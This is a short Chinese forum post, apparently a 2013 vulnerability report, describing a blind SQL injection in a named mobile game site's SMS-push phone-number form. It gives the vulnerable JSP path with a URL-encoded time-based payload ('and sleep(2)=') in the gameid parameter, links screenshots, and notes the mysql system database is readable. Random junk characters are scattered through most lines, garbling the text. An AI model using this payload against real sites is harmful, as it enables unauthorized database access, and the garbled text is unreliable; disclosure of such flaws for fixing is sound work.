简要描述:4 V" u2 ]# j$ D
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
n* w5 @6 f; i5 c$ j4 O+ {
- ]8 d* ~0 u0 B详细说明:
: i% ^/ Q; j2 `. x" R5 M: a存在SQL盲注url:
& {! b& j; q- o6 T3 Mfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1; q9 s( Q) `' ^) _/ v1 {
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
- l! A# X+ ?& o3 L4 ^http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
- K8 ?! `& O5 y- R3 o/ s0 R5 C7 y1 Bhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
9 `) z2 r5 J/ M$ b' x/ f: R4 ~4 @4 i' f$ A6 `* G L
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对